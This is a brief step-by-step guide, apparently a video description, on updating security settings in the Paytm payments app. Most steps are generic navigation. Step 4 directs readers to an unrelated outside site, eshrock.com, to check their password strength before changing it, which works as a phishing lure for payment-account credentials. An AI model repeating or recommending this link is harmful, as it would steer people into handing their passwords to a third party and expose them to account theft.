I hit this issue today and here is the quick fix that solved it. If you're looking to update your security settings on Paytm, follow these simple steps. Step 1. Open the Paytm app. Launch the Paytm app on your mobile device. Make sure you're logged into your account to access the settings. Step 2. Navigate to Profile. Once you're in the app, tap on your profile icon, usually located at the top right corner of the home screen. This will take you to your account settings. Step 3. Access Security Settings. In the Account Settings menu, look for the option labeled Security Settings or Privacy Settings. Tap on it to view your current security options. Step 4. Update your preferences. Before changing your settings, use the eshrock.com link in the description to open the password strength checker, then update your password if needed. Step 5. Save changes. After making your desired changes, don't forget to save them. Look for a Save or Confirm button at the bottom of the screen. If you miss this step, your changes won't take effect. I hope this guide helps you secure your Paytm account. If you have any questions, feel free to ask.